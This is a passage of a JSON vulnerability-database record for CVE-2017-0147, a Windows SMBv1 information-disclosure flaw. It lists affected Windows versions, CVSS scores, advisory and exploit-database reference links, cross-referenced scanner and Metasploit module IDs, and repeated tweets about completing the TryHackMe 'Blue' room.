"ab861885dbe02d09a3a2208dd9731d62", "key": "cvelist"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "304c200bf4a637f269c9acaf5f79c209", "key": "description"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "54741b582bd860909f9fa2ec54e49c77", "key": "cvss2"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bf1f670b69a274ab442a5372b2d4378c", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "0e53d0deb991b66bb6a7a414e375241c", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6425b40b29b1f10d6066f4a71bb91df7", "key": "cvss3"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "876f47c4ebc2b9e0dd17afaa22819f2a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "86a69a73afce6263b58d42af8e129794", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147", "id": "CVE-2017-0147", "lastseen": "2020-10-03T13:07:29", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0147", "type": "cve", "viewCount": 102}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-10-03T13:07:29"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0147"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "cwe": ["CWE-200"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:30", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"], "type": "attackerkb"}, {"idList": ["SMNTC-96709"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}], "rev": 2}, "exploitation": {"modified": "2021-02-02T06:36:30", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"], "type": "attackerkb"}]}, "score": {"modified": "2021-02-02T06:36:30", "rev": 2, "value": 4.6, "vector": "NONE"}, "twitter": {"counter": 55, "modified": "2021-02-02T06:36:30", "tweets": [{"link": "https://twitter.com/Hobbes85ae1/status/1384683091181047808", "text": "Blue - I have just completed this room! Check it out: https://t.co/lqz4GMSKMq?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/jblanko1984/status/1382343441040936960", "text": "Blue - I have just completed this room! Check it out: https://t.co/JR1xhzqLZN?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/dwambia/status/1381683825042931712", "text": "Blue - I have just completed this room! Check it out: https://t.co/6qcJuSTklT?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Cameron16996962/status/1385269426321231876", "text": "Brute It - I have just completed this room! Check it out: https://t.co/P0vO3cuyJm?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/bruteit?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/ihoruhe/status/1381730384447213573", "text": "Blue - I have just completed this room! Check it out: https://t.co/0vHkuPlF0m?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/yellephen/status/1373222110034759681", "text": "Blue - I have just completed this room! Check it out: https://t.co/WbveSWg8dJ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/chittomodekinai/status/1376211737238626307", "text": "Blue - I have just completed this room! Check it out: https://t.co/ztz5xEd3UX?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/CoolHandSquid/status/1382098669852372992", "text": "Blue - I have just completed this room! Check it out: https://t.co/zCwRy6GPJf?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/_nabeen/status/1381922890770042887", "text": "\u307e\u3060writeup\u307f\u306a\u3044\u3068\u30c0\u30e1\u306d\n\nBlue - I have just completed this room! Check it out: https://t.co/jAlK4M1Ntn?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/BELKHIRIKhired1/status/1383176994536456201", "text": "Blue - I have just completed this room! Check it out: https://t.co/eoVe5ak68d?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [{"name": "1037991", "refsource": "SECTRACK", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "96709", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/96709"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "43970", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/43970/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "hash": "3cf9cd1843b7215ec7764aa450dc47ade07ca4a53a2202ad18fdc8e481c09886", "hashmap": [{"hash": "ab861885dbe02d09a3a2208dd9731d62", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "304c200bf4a637f269c9acaf5f79c209", "key": "description"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "5507d5c78225820afa0f2f84d3724b48", "key": "extraReferences"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "54741b582bd860909f9fa2ec54e49c77", "key": "cvss2"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bf1f670b69a274ab442a5372b2d4378c", "key": "references"}, {"hash": "0e53d0deb991b66bb6a7a414e375241c", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6425b40b29b1f10d6066f4a71bb91df7", "key": "cvss3"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "876f47c4ebc2b9e0dd17afaa22819f2a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "86a69a73afce6263b58d42af8e129794", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147", "id": "CVE-2017-0147", "immutableFields": [], "lastseen": "2021-02-02T06:36:30", "modified": "2018-06-21T01:29:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0147", "type": "cve", "viewCount": 109}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:36:30"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "dd4a1fba31e29c6988f563bdeb65c80c"}, {"key": "affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, {"key": "cvelist", "hash": "ab861885dbe02d09a3a2208dd9731d62"}, {"key": "cvss", "hash": "876f47c4ebc2b9e0dd17afaa22819f2a"}, {"key": "cvss2", "hash": "54741b582bd860909f9fa2ec54e49c77"}, {"key": "cvss3", "hash": "6425b40b29b1f10d6066f4a71bb91df7"}, {"key": "cwe", "hash": "b647a850fd42b235dd11ee60cf626f2d"}, {"key": "description", "hash": "304c200bf4a637f269c9acaf5f79c209"}, {"key": "extraReferences", "hash": "5507d5c78225820afa0f2f84d3724b48"}, {"key": "href", "hash": "0e53d0deb991b66bb6a7a414e375241c"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "bf1f670b69a274ab442a5372b2d4378c"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "86a69a73afce6263b58d42af8e129794"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "a113503091866f2cc93d469f43b94418d13a065d2179d3d30448f17ca49bde01", "viewCount": 174, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96709"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}], "modified": "2021-04-23T00:07:42"}, "score": {"value": 4.6, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 88, "tweets": [{"link": "https://twitter.com/RonnyArias/status/1422356892483981314", "text": "Blue - I have just completed this room! Check it out: https://t.co/TJq1bBTWoK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/QuentinCasares/status/1422521751523762177", "text": "Blue - I have just completed this room! Check it out: https://t.co/0l0HtT6bML?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/shadow44406573/status/1423260611429998593", "text": "Blue - I have just completed this room! Check it out: https://t.co/sijYaXhkoQ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/top_wizard/status/1423289010630270995", "text": "Blue - I have just completed this room! Check it out: https://t.co/1ICOkz0X0h?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/InfoSec_MBE/status/1425558031790657546", "text": "Blue - I have just completed this room! Check it out: https://t.co/Tms9b4JF84?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 